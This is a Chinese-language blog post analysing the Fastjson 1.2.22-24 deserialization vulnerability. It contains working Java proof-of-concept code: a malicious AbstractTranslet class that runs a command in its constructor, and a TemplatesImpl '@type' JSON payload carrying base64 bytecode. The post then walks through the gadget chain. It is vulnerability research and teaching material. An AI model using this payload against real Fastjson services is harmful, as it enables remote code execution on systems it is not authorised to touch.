Fastjson 1.2.22-24 反序列化漏洞分析(1)

前言

FastJson是alibaba的一款开源JSON解析库,可用于将Java对象转换为其JSON表示形式,也可以用于将JSON字符串转换为等效的Java对象。

影响版本:1.2.22-24

官方通告:https://github.com/alibaba/fastjson/wiki/security_update_20170315

补丁:https://github.com/alibaba/fastjson/commit/d075721cf396d5cb70e24c824b901e3a9a5b342b

漏洞分析

实验环境:jdk8u121

创建一个恶意类EvilPayload,继承AbstractTranslet

  1. package com.yy.FastJson.payload01;
  3. import com.sun.org.apache.xalan.internal.xsltc.DOM;
  4. import com.sun.org.apache.xalan.internal.xsltc.TransletException;
  5. import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
  6. import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
  7. import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
  9. import java.io.IOException;
  11. public class EvilPayload extends AbstractTranslet {
  12.     public EvilPayload() throws IOException {
  13.         Runtime.getRuntime().exec("calc");
  14.     }
  15.     public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {
  17.     }
  19.     public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {
  21.     }
  23.     public static void main(String[] args) throws IOException {
  24.         EvilPayload t = new EvilPayload();
  25.     }
  26. }

新建一个Poc类

  1. package com.yy.FastJson.payload01;
  3. import org.apache.commons.io.IOUtils;
  4. import org.apache.commons.codec.binary.Base64;
  5. import com.alibaba.fastjson.JSON;
  6. import com.alibaba.fastjson.parser.Feature;
  7. import com.alibaba.fastjson.parser.ParserConfig;
  8. import java.io.ByteArrayOutputStream;
  9. import java.io.File;
  10. import java.io.FileInputStream;
  11. import java.io.IOException;
  13. public class Poc {
  15.     public static String readClass(String cls){
  16.         ByteArrayOutputStream bos = new ByteArrayOutputStream();
  17.         try {
  18.             IOUtils.copy(new FileInputStream(new File(cls)), bos);
  19.         } catch (IOException e) {
  20.             e.printStackTrace();
  21.         }
  23.         String result = Base64.encodeBase64String(bos.toByteArray());
  25.         return result;
  26.     }
  28.     public static void bad_method() {
  29.         ParserConfig config = new ParserConfig();
  30.         String evil_path = "D:\\study\\java\\code\\vuln-master\\src\\main\\java\\com\\yy\\FastJson\\payload01\\EvilPayload.class";
  31.         String evil_code = readClass(evil_path);
  33.         final String NASTY_CLASS = "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl";
  35.         String json = "{\"@type\":\"" + NASTY_CLASS +
  36.                 "\",\"_bytecodes\":[\""+evil_code+"\"]," +
  37.                 "'_name':'yang'," +
  38.                 "'_tfactory':{}," +
  39.                 "\"_outputProperties\":{}}\n";
  40.         System.out.println(json);
  41.         Object obj = JSON.parseObject(json,Feature.SupportNonPublicField);
  42.     }
  44.     public static void main(String args[]) {
  45.         bad_method();
  46.     }
  48. }

上面生成的text1为:

  1. {"@type":"com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl","_bytecodes":["yv66vgAAAD...这里是EvilPayload.class的字节码文件转换成base64的字符串"],'_name':'yang','_tfactory':{ },"_outputProperties":{ }}

解析:

Poc类中的readClass方法,把class文件读取,然后进行base64编码变成字符串。

@type后面指定了反序列化的类为TemplatesImpl类,其类的属性

  1. _bytecodes设置为恶意类
  2. _name设置为yang
  3. _tfactory设置为空
  4. _outputProperties也为空

这个poc利用的就是parseObject或者parse

poc调试:

这个调用链的入口是getOutputProperties方法,其中的Getter方法满足加入fieldList[]列表的条件,所以无论是用parseObject还是parse都会调用get方法

前面在fastjson中,会把evil_code进行base64解码后设置给_bytecodes

把断点下到newTransformer().getOutputProperties()

跟进newTransformer()方法,其调用了getTransletInstance()方法

跟进getTransletInstance()方法,其_class为null,所以会调用到defineTransletClasses()方法

跟进defineTransletClasses()方法

这个方法调用了defineClass()方法,可以从byte[]还原出一个Class对象,Class对象在调用newInstance()方法就会进行实例化

回到getTransletInstance()方法中,进行了newInstance()实例化,然后就会调用其构造方法触发执行。

注意点:

1)TemplatesImpl中_name的值不为null,才会调用到defineTransletClasses

2)_bytecodes为null会报异常

3)_tfactory会调用getExternalExtensionsMap()方法,如果为null会报错

_tfactory是在fastjson中被赋值的

图片来源:https://blog.csdn.net/qq_34101364/article/details/111706189

4)恶意类要继承AbstractTranslet类,因为这里会进行类型转换

总结:

fastjson在反序列化过程中,会getOutputProperties()方法,最后调用到newInstance()方法就会进行实例化触发构造函数的执行。

无论通过fastjson哪种方式解析json字符串,都会触发getOutputProperties()方法,但要注意的是,前提是开发需要代码中写了Feature.SupportNonPublicField选项,导致了利用点更加的苛刻。

参考:

https://www.anquanke.com/post/id/211035#h2-5

https://blog.csdn.net/qq_34101364/article/details/111706189

https://www.cnblogs.com/sijidou/p/13121332.html?ivk_sa=1024320u

Fastjson 1.2.22-24 反序列化漏洞分析(1)的更多相关文章

  1. Fastjson 1.2.22-24 反序列化漏洞分析

    目录 0x00 废话 0x01 简单介绍 FastJson的简单使用 0x02 原理分析 分析POC 调试分析 0x03 复现过程 0x04 参考文章 0x00 废话 balabala 开始 0x01 ...

  2. Fastjson反序列化漏洞分析 1.2.22-1.2.24

    Fastjson反序列化漏洞分析 1.2.22-1.2.24 Fastjson是Alibaba开发的Java语言编写的高性能JSON库,用于将数据在JSON和Java Object之间互相转换,提供两 ...

  3. Java安全之Fastjson反序列化漏洞分析

    Java安全之Fastjson反序列化漏洞分析 首发:先知论坛 0x00 前言 在前面的RMI和JNDI注入学习里面为本次的Fastjson打了一个比较好的基础.利于后面的漏洞分析. 0x01 Fas ...

  4. Fastjson 1.2.22-24 反序列化漏洞分析(2)

    Fastjson 1.2.22-24 反序列化漏洞分析(2) 1.环境搭建 我们以ubuntu作为被攻击的服务器,本机电脑作为攻击者 本机地址:192.168.202.1 ubuntu地址:192.1 ...

  5. Shiro 550反序列化漏洞分析

    Shiro 550反序列化漏洞分析 一.漏洞简介 影响版本:Apache Shiro < 1.2.4 特征判断:返回包中包含rememberMe=deleteMe字段. Apache Shiro ...

  6. Java反序列化漏洞分析

    相关学习资料 http://www.freebuf.com/vuls/90840.html https://security.tencent.com/index.php/blog/msg/97 htt ...

  7. ref:Java安全之反序列化漏洞分析(简单-朴实)

    ref:https://mp.weixin.qq.com/s?__biz=MzIzMzgxOTQ5NA==&mid=2247484200&idx=1&sn=8f3201f44e ...

  8. Java安全之Shiro 550反序列化漏洞分析

    Java安全之Shiro 550反序列化漏洞分析 首发自安全客:Java安全之Shiro 550反序列化漏洞分析 0x00 前言 在近些时间基本都能在一些渗透或者是攻防演练中看到Shiro的身影,也是 ...

  9. Java安全之Cas反序列化漏洞分析

    Java安全之Cas反序列化漏洞分析 0x00 前言 某次项目中遇到Cas,以前没接触过,借此机会学习一波. 0x01 Cas 简介 CAS 是 Yale 大学发起的一个开源项目,旨在为 Web 应用 ...

随机推荐

  1. http request 请求拦截器,有token值则配置上token值

    // http request 请求拦截器,有token值则配置上token值 axios.interceptors.request.use( config => { if (token) { ...

  2. python UI自动化之鼠标事件

    使用 pyautogui 模块:import pyautogui 1. 鼠标移动至:1629,875是电脑屏幕坐标:0.25是移动时间 pyautogui.moveTo(1629,875, durat ...

  3. Android:Camera2的简单使用

    以前用的是Camera,但是现在Camera已经被官方弃用了,所以这里使用的是Camera2进行演示 使用Camera需要注意的就是权限的获取,必须有权限 类图介绍 Camera2跟Camera1不一 ...

  4. Java_classpath

    Java_classpath 什么是classpath? classpath是JVM用到的一个环境变量,它用来指示JVM如何搜索class. 因为Java是编译型语言,源码文件是.java,而编译后的 ...

  5. awk-01-选项和模式

    awk介绍 awk 是一个处理文本的编程语言工具,能用简短的程序处理标准输入或文件.数据排序.计算以及生产报表等等 语法 awk option ' pattern {action} ' file pa ...

  6. Golang语言系列-09-接口

    接口 接口的定义和实现 package main import "fmt" /* [接口] 接口(interface)定义了一个对象的行为规范,只定义规范不实现,由具体的对象来实现 ...

  7. shell 获取当前路径 和 2>&1 &的作用

    #!/bin/bash current_path=$(cd $(dirname "${BASH_SOURCE[0]}") && pwd) nohup $curren ...

  8. VS+Qt+Halcon——显示图片,实现鼠标缩放、移动图片

    摘要 本篇博文记录一下,用VS+Qt+Halcon实现对图片的读取以及鼠标缩放,移动(鼠标事件调用了halcon自带的算子)的过程.以及遇到的坑..... 先来看一下动态效果图: 主要控件: 添加一个 ...

  9. NOIP 模拟 6 大佬

    这道题是一道数学期望,考场上想的是,每相邻 \(k\) 天之间有 \(k-1\) 天是重合的,所以每两端之间肯定是有影响的. 结果啪啪打脸 这道题其实不用考虑每两段之间的影响,因为在上一段的每种排法, ...

  10. noip 模拟9 题解

    rp++==文化课报废 考试经过 先看T1,有被1e12吓到,但根据经验这很可能是水题,经过一番观察后直接打表,似乎看出了规律,觉得应该有了正解,写完之后顺利过掉大样例,但似乎时间稍慢一点,写上快读交 ...